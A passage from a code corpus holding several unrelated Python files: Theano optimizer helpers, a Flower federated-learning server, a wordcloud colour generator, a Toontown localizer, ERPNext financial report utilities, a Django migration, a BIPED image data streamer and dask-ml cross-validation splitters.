subtensor. We should not apply optimizations on node that are in fgraph. So we don't optimize node that have an attribute fgraph. :note: This don't do an equilibrium... So if there is optimization like local_upcast_elemwise_constant_inputs in the list, that add additional node to the inputs of the node, it can be needed to call this function multiple time. ''' def local_recursive_function(list_opt, out, optimized_vars, depth): if not getattr(out, 'owner', None): return [out], optimized_vars node = out.owner if hasattr(node, 'fgraph'): return node.outputs, optimized_vars for idx, inp in enumerate(node.inputs): if inp in optimized_vars: nw_in = optimized_vars[inp] else: if inp.owner: outs, optimized_vars = local_recursive_function( list_opt, inp, optimized_vars, depth + 1) for k, v in zip(inp.owner.outputs, outs): optimized_vars[k] = v nw_in = outs[inp.owner.outputs.index(inp)] else: nw_in = inp optimized_vars[inp] = inp node.inputs[idx] = nw_in results = node.outputs for opt in list_opt: ret = opt.transform(node) if ret is not False and ret is not None: assert len(ret) == len(node.outputs) for k, v in zip(node.outputs, ret): optimized_vars[k] = v results = ret if ret[0].owner: node = out.owner else: break return results, optimized_vars final_outs, optimized_nodes = local_recursive_function( list_optimizations, out, {}, 0) return final_outs[0] ############ ### Misc ### ############ class InplaceOptimizer(Optimizer): def __init__(self, inplace): self.inplace = inplace def apply(self, fgraph): self.inplace(fgraph) def add_requirements(self, fgraph): fgraph.attach_feature(dh.DestroyHandler()) class PureThenInplaceOptimizer(Optimizer): def __init__(self, pure, inplace): self.pure = pure self.inplace = inplace def apply(self, fgraph): self.pure(fgraph) fgraph.attach_feature(dh.DestroyHandler()) self.inplace(fgraph)
py
7dfce5b96d6fe4864ebb617d7467c6360afee308
# Copyright 2020 Adap GmbH. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Minimal example on how to start a simple Flower server.""" import argparse from typing import Callable, Dict, Optional, Tuple import numpy as np import flwr as fl from . import DEFAULT_SERVER_ADDRESS, fashion_mnist def main() -> None: """Start server and train five rounds.""" parser = argparse.ArgumentParser(description="Flower") parser.add_argument( "--server_address", type=str, default=DEFAULT_SERVER_ADDRESS, help=f"gRPC server address (default: {DEFAULT_SERVER_ADDRESS})", ) parser.add_argument( "--rounds", type=int, default=1, help="Number of rounds of federated learning (default: 1)", ) parser.add_argument( "--sample_fraction", type=float, default=0.1, help="Fraction of available clients used for fit/evaluate (default: 0.1)", ) parser.add_argument( "--min_sample_size", type=int, default=1, help="Minimum number of clients used for fit/evaluate (default: 1)", ) parser.add_argument( "--min_num_clients", type=int, default=1, help="Minimum number of available clients required for sampling (default: 1)", ) parser.add_argument( "--log_host", type=str, help="Logserver address (no default)", ) args = parser.parse_args() # Configure logger fl.common.logger.configure("server", host=args.log_host) # Load evaluation data _, xy_test = fashion_mnist.load_data(partition=0, num_partitions=1) # Create client_manager, strategy, and server client_manager = fl.server.SimpleClientManager() strategy = fl.server.strategy.DefaultStrategy( fraction_fit=args.sample_fraction, min_fit_clients=args.min_sample_size, min_available_clients=args.min_num_clients, eval_fn=get_eval_fn(xy_test=xy_test), on_fit_config_fn=fit_config, ) server = fl.server.Server(client_manager=client_manager, strategy=strategy) # Run server fl.server.start_server( args.server_address, server, config={"num_rounds": args.rounds}, ) def fit_config(rnd: int) -> Dict[str, str]: """Return a configuration with static batch size and (local) epochs.""" config = { "epoch_global": str(rnd), "epochs": str(1), "batch_size": str(64), } return config def get_eval_fn( xy_test: Tuple[np.ndarray, np.ndarray] ) -> Callable[[fl.common.Weights], Optional[Tuple[float, float]]]: """Return an evaluation function for centralized evaluation.""" def evaluate(weights: fl.common.Weights) -> Optional[Tuple[float, float]]: """Use the entire Fashion-MNIST test set for evaluation.""" model = fashion_mnist.load_model() model.set_weights(weights) loss, acc = model.evaluate(xy_test[0], xy_test[1], batch_size=len(xy_test)) return float(loss), float(acc) return evaluate if __name__ == "__main__": main()
py
7dfce6a0659bfc789be0b2157056eda6d5d18344
import numpy as np from PIL import ImageFont class ImageColorGenerator(object): """Color generator based on a color image. Generates colors based on an RGB image. A word will be colored using the mean color of the enclosing rectangle in the color image. After construction, the object acts as a callable that can be passed as color_func to the word cloud constructor or to the recolor method. Parameters ---------- image : nd-array, shape (height, width, 3) Image to use to generate word colors. Alpha channels are ignored. This should be the same size as the canvas. for the wordcloud. """ # returns the average color of the image in that region def __init__(self, image): if image.ndim not in [2, 3]: raise ValueError("ImageColorGenerator needs an image with ndim 2 or" " 3, got %d" % image.ndim) if image.ndim == 3 and image.shape[2] not in [3, 4]: raise ValueError("A color image needs to have 3 or 4 channels, got %d" % image.shape[2]) self.image = image def __call__(self, word, font_size, font_path, position, orientation, **kwargs): """Generate a color for a given word using a fixed image.""" # get the font to get the box size font = ImageFont.truetype(font_path, font_size) transposed_font = ImageFont.TransposedFont(font, orientation=orientation) # get size of resulting text box_size = transposed_font.getsize(word) x = position[0] y = position[1] # cut out patch under word box patch = self.image[x:x + box_size[0], y:y + box_size[1]] if patch.ndim == 3: # drop alpha channel if any patch = patch[:, :, :3] if patch.ndim == 2: raise NotImplementedError("Gray-scale images TODO") color = np.mean(patch.reshape(-1, 3), axis=0) return "rgb(%d, %d, %d)" % tuple(color)
py
7dfce6dd535b4cad6fb0dfae6d8ab7e13fe00ac7
from panda3d.core import * from direct.showbase import DConfig import string import types try: language = DConfig.GetString('language', 'english') checkLanguage = DConfig.GetBool('check-language', 0) except: language = simbase.config.GetString('language', 'english') checkLanguage = simbase.config.GetBool('check-language', 0) def getLanguage(): return language print('TTLocalizer: Running in language: %s' % language) if language == 'english': _languageModule = 'toontown.toonbase.TTLocalizer' + language.capitalize() else: checkLanguage = 1 _languageModule = 'toontown.toonbase.TTLocalizer_' + language print('from ' + _languageModule + ' import *') from toontown.toonbase.TTLocalizerEnglish import * if checkLanguage: l = {} g = {} englishModule = __import__('toontown.toonbase.TTLocalizerEnglish', g, l) foreignModule = __import__(_languageModule, g, l) for key, val in list(englishModule.__dict__.items()): if key not in foreignModule.__dict__: print('WARNING: Foreign module: %s missing key: %s' % (_languageModule, key)) locals()[key] = val elif isinstance(val, dict): fval = foreignModule.__dict__.get(key) for dkey, dval in list(val.items()): if dkey not in fval: print('WARNING: Foreign module: %s missing key: %s.%s' % (_languageModule, key, dkey)) fval[dkey] = dval for dkey in list(fval.keys()): if dkey not in val: print('WARNING: Foreign module: %s extra key: %s.%s' % (_languageModule, key, dkey)) for key in list(foreignModule.__dict__.keys()): if key not in englishModule.__dict__: print('WARNING: Foreign module: %s extra key: %s' % (_languageModule, key))
py
7dfce85629b832ebfa494dbd3688e09d5899c980
# -*- coding: utf-8 -*- # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import re from past.builtins import cmp import functools import math import frappe, erpnext from erpnext.accounts.report.utils import get_currency, convert_to_presentation_currency from erpnext.accounts.utils import get_fiscal_year from frappe import _ from frappe.utils import (flt, getdate, get_first_day, add_months, add_days, formatdate, cstr, cint) from six import itervalues from erpnext.accounts.doctype.accounting_dimension.accounting_dimension import get_accounting_dimensions, get_dimension_with_children def get_period_list(from_fiscal_year, to_fiscal_year, period_start_date, period_end_date, filter_based_on, periodicity, accumulated_values=False, company=None, reset_period_on_fy_change=True, ignore_fiscal_year=False): """Get a list of dict {"from_date": from_date, "to_date": to_date, "key": key, "label": label} Periodicity can be (Yearly, Quarterly, Monthly)""" if filter_based_on == 'Fiscal Year': fiscal_year = get_fiscal_year_data(from_fiscal_year, to_fiscal_year) validate_fiscal_year(fiscal_year, from_fiscal_year, to_fiscal_year) year_start_date = getdate(fiscal_year.year_start_date) year_end_date = getdate(fiscal_year.year_end_date) else: validate_dates(period_start_date, period_end_date) year_start_date = getdate(period_start_date) year_end_date = getdate(period_end_date) months_to_add = { "Yearly": 12, "Half-Yearly": 6, "Quarterly": 3, "Monthly": 1 }[periodicity] period_list = [] start_date = year_start_date months = get_months(year_start_date, year_end_date) for i in range(cint(math.ceil(months / months_to_add))): period = frappe._dict({ "from_date": start_date }) to_date = add_months(start_date, months_to_add) start_date = to_date # Subtract one day from to_date, as it may be first day in next fiscal year or month to_date = add_days(to_date, -1) if to_date <= year_end_date: # the normal case period.to_date = to_date else: # if a fiscal year ends before a 12 month period period.to_date = year_end_date if not ignore_fiscal_year: period.to_date_fiscal_year = get_fiscal_year(period.to_date, company=company)[0] period.from_date_fiscal_year_start_date = get_fiscal_year(period.from_date, company=company)[1] period_list.append(period) if period.to_date == year_end_date: break # common processing for opts in period_list: key = opts["to_date"].strftime("%b_%Y").lower() if periodicity == "Monthly" and not accumulated_values: label = formatdate(opts["to_date"], "MMM YYYY") else: if not accumulated_values: label = get_label(periodicity, opts["from_date"], opts["to_date"]) else: if reset_period_on_fy_change: label = get_label(periodicity, opts.from_date_fiscal_year_start_date, opts["to_date"]) else: label = get_label(periodicity, period_list[0].from_date, opts["to_date"]) opts.update({ "key": key.replace(" ", "_").replace("-", "_"), "label": label, "year_start_date": year_start_date, "year_end_date": year_end_date }) return period_list def get_fiscal_year_data(from_fiscal_year, to_fiscal_year): fiscal_year = frappe.db.sql("""select min(year_start_date) as year_start_date, max(year_end_date) as year_end_date from `tabFiscal Year` where name between %(from_fiscal_year)s and %(to_fiscal_year)s""", {'from_fiscal_year': from_fiscal_year, 'to_fiscal_year': to_fiscal_year}, as_dict=1) return fiscal_year[0] if fiscal_year else {} def validate_fiscal_year(fiscal_year, from_fiscal_year, to_fiscal_year): if not fiscal_year.get('year_start_date') or not fiscal_year.get('year_end_date'): frappe.throw(_("Start Year and End Year are mandatory")) if getdate(fiscal_year.get('year_end_date')) < getdate(fiscal_year.get('year_start_date')): frappe.throw(_("End Year cannot be before Start Year")) def validate_dates(from_date, to_date): if not from_date or not to_date: frappe.throw("From Date and To Date are mandatory") if to_date < from_date: frappe.throw("To Date cannot be less than From Date") def get_months(start_date, end_date): diff = (12 * end_date.year + end_date.month) - (12 * start_date.year + start_date.month) return diff + 1 def get_label(periodicity, from_date, to_date): if periodicity == "Yearly": if formatdate(from_date, "YYYY") == formatdate(to_date, "YYYY"): label = formatdate(from_date, "YYYY") else: label = formatdate(from_date, "YYYY") + "-" + formatdate(to_date, "YYYY") else: label = formatdate(from_date, "MMM YY") + "-" + formatdate(to_date, "MMM YY") return label def get_data( company, root_type, balance_must_be, period_list, filters=None, accumulated_values=1, only_current_fiscal_year=True, ignore_closing_entries=False, ignore_accumulated_values_for_fy=False , total = True): accounts = get_accounts(company, root_type) if not accounts: return None accounts, accounts_by_name, parent_children_map = filter_accounts(accounts) company_currency = get_appropriate_currency(company, filters) gl_entries_by_account = {} for root in frappe.db.sql("""select lft, rgt from tabAccount where root_type=%s and ifnull(parent_account, '') = ''""", root_type, as_dict=1): set_gl_entries_by_account( company, period_list[0]["year_start_date"] if only_current_fiscal_year else None, period_list[-1]["to_date"], root.lft, root.rgt, filters, gl_entries_by_account, ignore_closing_entries=ignore_closing_entries ) calculate_values( accounts_by_name, gl_entries_by_account, period_list, accumulated_values, ignore_accumulated_values_for_fy) accumulate_values_into_parents(accounts, accounts_by_name, period_list) out = prepare_data(accounts, balance_must_be, period_list, company_currency) out = filter_out_zero_value_rows(out, parent_children_map) if out and total: add_total_row(out, root_type, balance_must_be, period_list, company_currency) return out def get_appropriate_currency(company, filters=None): if filters and filters.get("presentation_currency"): return filters["presentation_currency"] else: return frappe.get_cached_value('Company', company, "default_currency") def calculate_values( accounts_by_name, gl_entries_by_account, period_list, accumulated_values, ignore_accumulated_values_for_fy): for entries in itervalues(gl_entries_by_account): for entry in entries: d = accounts_by_name.get(entry.account) if not d: frappe.msgprint( _("Could not retrieve information for {0}.").format(entry.account), title="Error", raise_exception=1 ) for period in period_list: # check if posting date is within the period if entry.posting_date <= period.to_date: if (accumulated_values or entry.posting_date >= period.from_date) and \ (not ignore_accumulated_values_for_fy or entry.fiscal_year == period.to_date_fiscal_year): d[period.key] = d.get(period.key, 0.0) + flt(entry.debit) - flt(entry.credit) if entry.posting_date < period_list[0].year_start_date: d["opening_balance"] = d.get("opening_balance", 0.0) + flt(entry.debit) - flt(entry.credit) def accumulate_values_into_parents(accounts, accounts_by_name, period_list): """accumulate children's values in parent accounts""" for d in reversed(accounts): if d.parent_account: for period in period_list: accounts_by_name[d.parent_account][period.key] = \ accounts_by_name[d.parent_account].get(period.key, 0.0) + d.get(period.key, 0.0) accounts_by_name[d.parent_account]["opening_balance"] = \ accounts_by_name[d.parent_account].get("opening_balance", 0.0) + d.get("opening_balance", 0.0) def prepare_data(accounts, balance_must_be, period_list, company_currency): data = [] year_start_date = period_list[0]["year_start_date"].strftime("%Y-%m-%d") year_end_date = period_list[-1]["year_end_date"].strftime("%Y-%m-%d") for d in accounts: # add to output has_value = False total = 0 row = frappe._dict({ "account": _(d.name), "parent_account": _(d.parent_account) if d.parent_account else '', "indent": flt(d.indent), "year_start_date": year_start_date, "year_end_date": year_end_date, "currency": company_currency, "include_in_gross": d.include_in_gross, "account_type": d.account_type, "is_group": d.is_group, "opening_balance": d.get("opening_balance", 0.0) * (1 if balance_must_be=="Debit" else -1), "account_name": ('%s - %s' %(_(d.account_number), _(d.account_name)) if d.account_number else _(d.account_name)) }) for period in period_list: if d.get(period.key) and balance_must_be == "Credit": # change sign based on Debit or Credit, since calculation is done using (debit - credit) d[period.key] *= -1 row[period.key] = flt(d.get(period.key, 0.0), 3) if abs(row[period.key]) >= 0.005: # ignore zero values has_value = True total += flt(row[period.key]) row["has_value"] = has_value row["total"] = total data.append(row) return data def filter_out_zero_value_rows(data, parent_children_map, show_zero_values=False): data_with_value = [] for d in data: if show_zero_values or d.get("has_value"): data_with_value.append(d) else: # show group with zero balance, if there are balances against child children = [child.name for child in parent_children_map.get(d.get("account")) or []] if children: for row in data: if row.get("account") in children and row.get("has_value"): data_with_value.append(d) break return data_with_value def add_total_row(out, root_type, balance_must_be, period_list, company_currency): total_row = { "account_name": _("Total {0} ({1})").format(_(root_type), _(balance_must_be)), "account": _("Total {0} ({1})").format(_(root_type), _(balance_must_be)), "currency": company_currency } for row in out: if not row.get("parent_account"): for period in period_list: total_row.setdefault(period.key, 0.0) total_row[period.key] += row.get(period.key, 0.0) row[period.key] = row.get(period.key, 0.0) total_row.setdefault("total", 0.0) total_row["total"] += flt(row["total"]) row["total"] = "" if "total" in total_row: out.append(total_row) # blank row after Total out.append({}) def get_accounts(company, root_type): return frappe.db.sql(""" select name, account_number, parent_account, lft, rgt, root_type, report_type, account_name, include_in_gross, account_type, is_group, lft, rgt from `tabAccount` where company=%s and root_type=%s order by lft""", (company, root_type), as_dict=True) def filter_accounts(accounts, depth=20): parent_children_map = {} accounts_by_name = {} for d in accounts: accounts_by_name[d.name] = d parent_children_map.setdefault(d.parent_account or None, []).append(d) filtered_accounts = [] def add_to_list(parent, level): if level < depth: children = parent_children_map.get(parent) or [] sort_accounts(children, is_root=True if parent==None else False) for child in children: child.indent = level filtered_accounts.append(child) add_to_list(child.name, level + 1) add_to_list(None, 0) return filtered_accounts, accounts_by_name, parent_children_map def sort_accounts(accounts, is_root=False, key="name"): """Sort root types as Asset, Liability, Equity, Income, Expense""" def compare_accounts(a, b): if re.split('\W+', a[key])[0].isdigit(): # if chart of accounts is numbered, then sort by number return cmp(a[key], b[key]) elif is_root: if a.report_type != b.report_type and a.report_type == "Balance Sheet": return -1 if a.root_type != b.root_type and a.root_type == "Asset": return -1 if a.root_type == "Liability" and b.root_type == "Equity": return -1 if a.root_type == "Income" and b.root_type == "Expense": return -1 else: # sort by key (number) or name return cmp(a[key], b[key]) return 1 accounts.sort(key = functools.cmp_to_key(compare_accounts)) def set_gl_entries_by_account( company, from_date, to_date, root_lft, root_rgt, filters, gl_entries_by_account, ignore_closing_entries=False): """Returns a dict like { "account": [gl entries], ... }""" additional_conditions = get_additional_conditions(from_date, ignore_closing_entries, filters) accounts = frappe.db.sql_list("""select name from `tabAccount` where lft >= %s and rgt <= %s and company = %s""", (root_lft, root_rgt, company)) if accounts: additional_conditions += " and account in ({})"\ .format(", ".join([frappe.db.escape(d) for d in accounts])) gl_filters = { "company": company, "from_date": from_date, "to_date": to_date, "finance_book": cstr(filters.get("finance_book")) } if filters.get("include_default_book_entries"): gl_filters["company_fb"] = frappe.db.get_value("Company", company, 'default_finance_book') for key, value in filters.items(): if value: gl_filters.update({ key: value }) distributed_cost_center_query = "" if filters and filters.get('cost_center'): distributed_cost_center_query = """ UNION ALL SELECT posting_date, account, debit*(DCC_allocation.percentage_allocation/100) as debit, credit*(DCC_allocation.percentage_allocation/100) as credit, is_opening, fiscal_year, debit_in_account_currency*(DCC_allocation.percentage_allocation/100) as debit_in_account_currency, credit_in_account_currency*(DCC_allocation.percentage_allocation/100) as credit_in_account_currency, account_currency FROM `tabGL Entry`, ( SELECT parent, sum(percentage_allocation) as percentage_allocation FROM `tabDistributed Cost Center` WHERE cost_center IN %(cost_center)s AND parent NOT IN %(cost_center)s GROUP BY parent ) as DCC_allocation WHERE company=%(company)s {additional_conditions} AND posting_date <= %(to_date)s AND is_cancelled = 0 AND cost_center = DCC_allocation.parent """.format(additional_conditions=additional_conditions.replace("and cost_center in %(cost_center)s ", '')) gl_entries = frappe.db.sql("""select posting_date, account, debit, credit, is_opening, fiscal_year, debit_in_account_currency, credit_in_account_currency, account_currency from `tabGL Entry` where company=%(company)s {additional_conditions} and posting_date <= %(to_date)s and is_cancelled = 0 {distributed_cost_center_query} order by account, posting_date""".format( additional_conditions=additional_conditions, distributed_cost_center_query=distributed_cost_center_query), gl_filters, as_dict=True) #nosec if filters and filters.get('presentation_currency'): convert_to_presentation_currency(gl_entries, get_currency(filters), filters.get('company')) for entry in gl_entries: gl_entries_by_account.setdefault(entry.account, []).append(entry) return gl_entries_by_account def get_additional_conditions(from_date, ignore_closing_entries, filters): additional_conditions = [] accounting_dimensions = get_accounting_dimensions(as_list=False) if ignore_closing_entries: additional_conditions.append("ifnull(voucher_type, '')!='Period Closing Voucher'") if from_date: additional_conditions.append("posting_date >= %(from_date)s") if filters: if filters.get("project"): if not isinstance(filters.get("project"), list): filters.project = frappe.parse_json(filters.get("project")) additional_conditions.append("project in %(project)s") if filters.get("cost_center"): filters.cost_center = get_cost_centers_with_children(filters.cost_center) additional_conditions.append("cost_center in %(cost_center)s") if filters.get("include_default_book_entries"): additional_conditions.append("(finance_book in (%(finance_book)s, %(company_fb)s, '') OR finance_book IS NULL)") else: additional_conditions.append("(finance_book in (%(finance_book)s, '') OR finance_book IS NULL)") if accounting_dimensions: for dimension in accounting_dimensions: if filters.get(dimension.fieldname): if frappe.get_cached_value('DocType', dimension.document_type, 'is_tree'): filters[dimension.fieldname] = get_dimension_with_children(dimension.document_type, filters.get(dimension.fieldname)) additional_conditions.append("{0} in %({0})s".format(dimension.fieldname)) else: additional_conditions.append("{0} in (%({0})s)".format(dimension.fieldname)) return " and {}".format(" and ".join(additional_conditions)) if additional_conditions else "" def get_cost_centers_with_children(cost_centers): if not isinstance(cost_centers, list): cost_centers = [d.strip() for d in cost_centers.strip().split(',') if d] all_cost_centers = [] for d in cost_centers: if frappe.db.exists("Cost Center", d): lft, rgt = frappe.db.get_value("Cost Center", d, ["lft", "rgt"]) children = frappe.get_all("Cost Center", filters={"lft": [">=", lft], "rgt": ["<=", rgt]}) all_cost_centers += [c.name for c in children] else: frappe.throw(_("Cost Center: {0} does not exist").format(d)) return list(set(all_cost_centers)) def get_columns(periodicity, period_list, accumulated_values=1, company=None): columns = [{ "fieldname": "account", "label": _("Account"), "fieldtype": "Link", "options": "Account", "width": 300 }] if company: columns.append({ "fieldname": "currency", "label": _("Currency"), "fieldtype": "Link", "options": "Currency", "hidden": 1 }) for period in period_list: columns.append({ "fieldname": period.key, "label": period.label, "fieldtype": "Currency", "options": "currency", "width": 150 }) if periodicity!="Yearly": if not accumulated_values: columns.append({ "fieldname": "total", "label": _("Total"), "fieldtype": "Currency", "width": 150 }) return columns
py
7dfce8b964db0124271ec368b119028c20cb2e41
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('competitions', '0001_initial'), ] operations = [ migrations.CreateModel( name='News', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('heading', models.CharField(max_length=500, verbose_name='heading')), ('text', models.CharField(max_length=500, null=True, verbose_name='text', blank=True)), ('added_at', models.DateTimeField(auto_now_add=True, verbose_name='added at')), ('modified_at', models.DateTimeField(auto_now=True, verbose_name='modified at')), ('added_by', models.ForeignKey(related_name='News_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='author')), ('competition', models.ForeignKey(verbose_name='competition', to='competitions.Competition')), ('modified_by', models.ForeignKey(related_name='News_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='last modified by')), ], options={ 'verbose_name': 'News', 'verbose_name_plural': 'News', }, bases=(models.Model,), ), ]
py
7dfce963b28e0535c8e8e979d70ca2f2dc45b85a
import numpy as np import cv2 from random import random from random import shuffle from random import randint from random import uniform import os import matplotlib.pyplot as plt def datastreamer_BIPED(batch_size = 10 , target_shape = (512,512), mode = 'train', base_path = '/Users/sarojitauddya/edges_detect/BIPED/edges/', debug = False): #print(mode) #print("Entered") #print(debug) target_x, target_y = target_shape edge_base_path = base_path + 'edge_maps/' imgs_base_path = base_path + 'imgs/' edge_path = '' imgs_path = '' if mode=='train': edge_path = edge_base_path + 'train/rgbr/real/' imgs_path = imgs_base_path + 'train/rgbr/real/' elif mode=='test': edge_path = edge_base_path + 'test/rgbr/' imgs_path = imgs_base_path + 'test/rgbr/' list_edge = os.listdir(edge_path) list_imgs = os.listdir(imgs_path) #print(list_edge) #print(list_imgs) num_images = 0 while 1: shuffle(list_edge) imgs_batch = [] edge_batch = [] for filename in list_edge: if filename[-3:]!='png' and filename[-3:]!='jpg': continue if num_images == batch_size: num_images = 0 imgs_batch = np.array(imgs_batch) #print(type(edge_batch)) edge_batch = np.array(edge_batch) if imgs_batch.shape[0] == 0: pass else: yield imgs_batch, edge_batch imgs_batch = [] edge_batch = [] image_path = imgs_path + filename[:-3] + 'jpg' edges_path = edge_path + filename image = plt.imread(image_path) edges = plt.imread(edges_path) if debug: print("Max Image pixel: "+str(np.max(image))) print("Min Image pixel: "+str(np.min(image))) patch_image = np.zeros((target_x,target_y,3)) patch_edges = np.zeros((target_x,target_y,1)) size_x, size_y,_ = image.shape edges = np.reshape(edges, (size_x, size_y, 1)) if size_x <= target_x or size_y <= target_y: #May not be the case for BIPED dataset print("Oddity in the BIPED dataset") patch_image = cv2.resize(image, (target_x, target_y), interpolation = cv2.INTER_CUBIC) patch_edges = cv2.resize(edges, (target_x, target_y), interpolation = cv2.INTER_CUBIC) #Generally the size of images in BIPED dataset is 720 by 1280 #Random patch based training start_x, start_y = randint(0, size_x - target_x), randint(0, size_y - target_y) patch_image = image[start_x:start_x + target_x, start_y:start_y + target_y,:] patch_edges = edges[start_x:start_x + target_x, start_y:start_y + target_y,:] #Random rotations (0,90,180,270) #Randomly rotate/flip rn_un = uniform(0,1) cv2_object = None if rn_un <= 0.25: cv2_object = cv2.ROTATE_90_COUNTERCLOCKWISE #counterclockwise 90 elif rn_un > 0.25 and rn_un<=0.5: cv2_object = cv2.ROTATE_90_CLOCKWISE #clockwise 90 elif rn_un >0.5 and rn_un<=0.75: cv2_object = cv2.ROTATE_180 #flip else: cv2_object = None if False: patch_image = cv2.rotate(patch_image, cv2_object) patch_edges = cv2.rotate(patch_edges, cv2_object) #Colour based augmentation #Randomly choose channels ch1 = randint(0,2) ch2 = randint(0,2) ch3 = randint(0,2) if debug: print("*****Chosen channels*****") print(ch1, ch2, ch3) print("*************************") patch_image_colour_aug = np.zeros(patch_image.shape) patch_image_colour_aug[:,:,0] = patch_image[:,:,ch1] patch_image_colour_aug[:,:,1] = patch_image[:,:,ch2] patch_image_colour_aug[:,:,2] = patch_image[:,:,ch3] patch_image = np.uint8(patch_image_colour_aug) #Thicken edges kernel = np.ones((2,2)) patch_edges = cv2.dilate(patch_edges, kernel, iterations = 2) if debug: plt.imshow(patch_image) plt.title("Patch Image") plt.show() plt.imshow(patch_edges) plt.title("Patch Edge") plt.show() patch_image = np.float32(patch_image) patch_edges = np.float32(patch_edges) imgs_batch.append(patch_image/255) edge_batch.append(patch_edges/np.max(patch_edges)) num_images += 1
py
7dfcea2b8462d08da0254784e273b77a2b337239
"""Utilities for splitting datasets. """ import itertools import logging import numbers import dask import dask.array as da import dask.dataframe as dd import numpy as np import sklearn.model_selection as ms from sklearn.model_selection._split import BaseCrossValidator, _validate_shuffle_split from sklearn.utils import check_random_state from dask_ml.utils import check_array, check_matching_blocks from .._utils import draw_seed logger = logging.getLogger(__name__) def _check_blockwise(blockwise): if blockwise not in {True, False}: raise ValueError( "Expected a boolean for 'blockwise " "but got {} instead".format(blockwise) ) return blockwise def _maybe_normalize_split_sizes(train_size, test_size): # adopt scikit-learn's new behavior (complement) now. if train_size is None and test_size is None: msg = "test_size and train_size can not both be None" raise ValueError(msg) elif any(isinstance(x, numbers.Integral) for x in (train_size, test_size)): raise ValueError( "Dask-ML does not support absolute sizes for " "'train_size' and 'test_size'. Use floats between " "0 and 1 to specify the fraction of each block " "that should go to the train and test set." ) if train_size is not None: if train_size < 0 or train_size > 1: raise ValueError( "'train_size' must be between 0 and 1. " "Got {}".format(train_size) ) if test_size is None: test_size = 1 - train_size if test_size is not None: if test_size < 0 or test_size > 1: raise ValueError( "'test_size' be between 0 and 1. " "Got {}".format(test_size) ) if train_size is None: train_size = 1 - test_size if abs(1 - (train_size + test_size)) > 0.001: raise ValueError( "The sum of 'train_size' and 'test_size' must be 1. " "train_size: {} test_size: {}".format(train_size, test_size) ) return train_size, test_size def _generate_idx(n, seed, n_train, n_test): """Generate train, test indices for a length-n array. Parameters ---------- n : int The length of the array seed : int Seed for a RandomState n_train, n_test : int, 0 < n_train, n_test < n Number of samples to use for the train or test index. Notes ----- """ idx = check_random_state(seed).permutation(n) ind_test = idx[:n_test] ind_train = idx[n_test : n_train + n_test] return ind_train, ind_test class ShuffleSplit(BaseCrossValidator): """Random permutation cross-validator. Yields indices to split data into training and test sets. .. warning:: By default, this performs a blockwise-shuffle. That is, each block is shuffled internally, but data are not shuffled between blocks. If your data is ordered, then set ``blockwise=False``. Note: contrary to other cross-validation strategies, random splits do not guarantee that all folds will be different, although this is still very likely for sizeable datasets. Parameters ---------- n_splits : int, default 10 Number of re-shuffling & splitting iterations. test_size : float, int, None, default=0.1 If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is set to the complement of the train size. train_size : float, int, or None, default=None If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. blockwise : bool, default True Whether to shuffle data only within blocks (True), or allow data to be shuffled between blocks (False). Shuffling between blocks can be much more expensive, especially in distributed environments. random_state : int, RandomState instance or None, optional (default=None) If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. """ def __init__( self, n_splits=10, test_size=0.1, train_size=None, blockwise=True, random_state=None, ): self.n_splits = n_splits self.test_size = test_size self.train_size = train_size self.random_state = random_state self.blockwise = _check_blockwise(blockwise) def split(self, X, y=None, groups=None): X = check_array(X) rng = check_random_state(self.random_state) for i in range(self.n_splits): seeds = draw_seed(rng, 0, 2 ** 32 - 1, size=len(X.chunks[0]), dtype="uint") if self.blockwise: yield self._split_blockwise(X, seeds) else: yield self._split(X) def _split_blockwise(self, X, seeds): chunks = X.chunks[0] train_pct, test_pct = _maybe_normalize_split_sizes( self.train_size, self.test_size ) sizes = [_validate_shuffle_split(c, test_pct, train_pct) for c in chunks] objs = [ dask.delayed(_generate_idx, nout=2)(chunksize, seed, n_train, n_test) for chunksize, seed, (n_train, n_test) in zip(chunks, seeds, sizes) ] train_objs, test_objs = zip(*objs) offsets = np.hstack([0, np.cumsum(chunks)]) train_idx = da.concatenate( [ da.from_delayed(x + offset, (train_size,), "i8") for x, chunksize, (train_size, _), offset in zip( train_objs, chunks, sizes, offsets ) ] ) test_idx = da.concatenate( [ da.from_delayed(x + offset, (test_size,), "i8") for x, chunksize, (_, test_size), offset in zip( test_objs, chunks, sizes, offsets ) ] ) return train_idx, test_idx def _split(self, X): raise NotImplementedError( "ShuffleSplit with `blockwise=False` has " "not been implemented yet." ) def get_n_splits(self, X=None, y=None, groups=None): return self.n_splits def _generate_offset_idx(n, start, stop, offset, seed): if seed is not None: idx = check_random_state(seed).permutation(n) else: idx = np.arange(n) return idx[start - offset : stop - offset] + offset class KFold(BaseCrossValidator): """K-Folds cross-validator Provides train/test indices to split data in train/test sets. Split dataset into k consecutive folds (without shuffling by default). Each fold is then used once as a validation while the k - 1 remaining folds form the training set. Parameters ---------- n_splits : int, default=5 Number of folds. Must be at least 2. shuffle : boolean, optional Whether to shuffle the data before splitting into batches. random_state : int, RandomState instance or None, optional, default=None If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. Used when ``shuffle`` == True. """ def __init__(self, n_splits=5, shuffle=False, random_state=None): self.n_splits = n_splits self.shuffle = shuffle self.random_state = random_state def split(self, X, y=None, groups=None): X = check_array(X) n_samples = X.shape[0] n_splits = self.n_splits fold_sizes = 